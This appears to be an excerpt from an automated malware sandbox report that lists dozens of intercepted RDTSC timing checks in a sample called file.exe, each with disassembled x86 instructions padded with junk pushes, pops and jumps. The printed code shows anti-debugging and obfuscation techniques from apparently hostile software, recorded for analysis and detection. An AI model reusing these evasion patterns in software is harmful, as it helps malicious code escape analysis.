Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548B5A second address: 548B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnp 00007F075D128EF6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54569C second address: 54574D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F075CBABEC8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d or dword ptr [ebp+122D1BE8h], ebx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a sub dword ptr [ebp+122D258Ch], ecx 0x00000040 mov eax, dword ptr [ebp+122D0029h] 0x00000046 mov dword ptr [ebp+1246469Ah], esi 0x0000004c sub dword ptr [ebp+122D1ABCh], esi 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push eax 0x00000057 call 00007F075CBABEC8h 0x0000005c pop eax 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 add dword ptr [esp+04h], 0000001Ah 0x00000069 inc eax 0x0000006a push eax 0x0000006b ret 0x0000006c pop eax 0x0000006d ret 0x0000006e call 00007F075CBABED7h 0x00000073 add dword ptr [ebp+1247BF40h], eax 0x00000079 pop edi 0x0000007a add di, 5550h 0x0000007f nop 0x00000080 pushad 0x00000081 pushad 0x00000082 push edi 0x00000083 pop edi 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549A74 second address: 549ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+122D1C09h] 0x0000000d stc 0x0000000e push 00000000h 0x00000010 adc ebx, 1B346E24h 0x00000016 push 00000000h 0x00000018 call 00007F075D128F06h 0x0000001d or bh, FFFFFFE0h 0x00000020 pop edi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 jmp 00007F075D128F03h 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508D3 second address: 5508D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508D9 second address: 5508DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508DD second address: 5508E7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F075CBABEC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508E7 second address: 5508F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550A42 second address: 550A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1289 second address: 4F12AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jne 00007F075D128EF6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55468D second address: 5546BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F075CBABED9h 0x00000012 jmp 00007F075CBABECAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F47FF second address: 4F4803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4803 second address: 4F4817 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F075CBABECEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4817 second address: 4F4822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F075D128EF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592B6 second address: 5592BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592BB second address: 5592C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592C1 second address: 5592C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592C5 second address: 559305 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F075D128EFEh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jg 00007F075D128F07h 0x0000001d jmp 00007F075D128F01h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559305 second address: 559317 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F075CBABECCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5593A0 second address: 5593AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5594B8 second address: 5594BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5594BC second address: 5594C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559542 second address: 55957F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 je 00007F075CBABEDBh 0x0000000d push ebx 0x0000000e jmp 00007F075CBABED3h 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F075CBABED0h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F96E second address: 55F994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F075D128EF6h 0x0000000a jmp 00007F075D128EFBh 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F075D128EFBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F53 second address: 4E6F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F075CBABECAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F62 second address: 4E6F67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F67 second address: 4E6F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABECCh 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F87 second address: 4E6F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F075D128EFFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F9B second address: 4E6FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EB87 second address: 55EB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F075D128F18h 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F075D128EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EB9A second address: 55EBA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EBA0 second address: 55EBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EBAA second address: 55EBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED01 second address: 55ED1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F075D128F07h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED1E second address: 55ED28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED28 second address: 55ED2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED2E second address: 55ED34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EFEB second address: 55EFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EFF1 second address: 55F024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABED0h 0x00000008 jng 00007F075CBABEC6h 0x0000000e jmp 00007F075CBABED4h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F3B6 second address: 55F3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F3BA second address: 55F3CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F3CB second address: 55F3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F503 second address: 55F524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F075CBABEC6h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F075CBABED0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F661 second address: 55F66D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F075D128EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F66D second address: 55F673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F673 second address: 55F677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F677 second address: 55F680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B4C second address: 4E8B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B50 second address: 4E8B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F075CBABECEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B64 second address: 4E8B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F075D128EF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B70 second address: 4E8B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B8E second address: 4E8B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56865F second address: 568663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566F86 second address: 566F8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567124 second address: 567128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5672A1 second address: 5672AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F075D128EF6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5672AD second address: 5672B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567890 second address: 5678B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F075D128F05h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5678B2 second address: 5678B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567B73 second address: 567B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F075D128EFEh 0x0000000b jng 00007F075D128EF6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567B86 second address: 567BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABED6h 0x00000008 jg 00007F075CBABEC6h 0x0000000e ja 00007F075CBABEC6h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567D22 second address: 567D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567D28 second address: 567D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567D2D second address: 567D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567EE5 second address: 567EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F075CBABEC6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5684E2 second address: 5684EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5684EC second address: 5684F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56F686 second address: 56F693 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D858 second address: 52D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D85C second address: 513D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F075D128F00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 pop ecx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F075D128EF8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f sub dword ptr [ebp+1245C068h], ebx 0x00000035 call dword ptr [ebp+122D2271h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F075D128F00h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D94E second address: 52D96D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F075CBABED4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D96D second address: 52D977 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DD02 second address: 52DD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DD06 second address: 52DD40 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075D128EF8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F075D128F04h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F075D128F04h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DE77 second address: 52DEB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F075CBABED8h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push edx 0x00000018 jnl 00007F075CBABEC6h 0x0000001e pop edx 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DEB0 second address: 52DEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F075D128EF8h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F075D128F02h 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F075D128EF8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xor ch, FFFFFFCEh 0x00000033 push 9F6A58A0h 0x00000038 push esi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DFFE second address: 52E02B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F075CBABEC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F075CBABECDh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007F075CBABECCh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E02B second address: 52E031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E031 second address: 52E035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E19A second address: 52E19E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E2C9 second address: 52E2F9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075CBABECCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edi, cx 0x00000010 push 00000004h 0x00000012 ja 00007F075CBABECCh 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c je 00007F075CBABEC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E2F9 second address: 52E2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E2FE second address: 52E30B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E7A9 second address: 52E7C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F075D128EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E920 second address: 52E926 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E926 second address: 52E97E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F075D128EFBh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F075D128EFBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jne 00007F075D128EF6h 0x00000026 jmp 00007F075D128F01h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EA46 second address: 52EA98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c je 00007F075CBABEC8h 0x00000012 mov ecx, ebx 0x00000014 jmp 00007F075CBABED4h 0x00000019 lea eax, dword ptr [ebp+12482531h] 0x0000001f jo 00007F075CBABEC6h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007F075CBABEC8h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
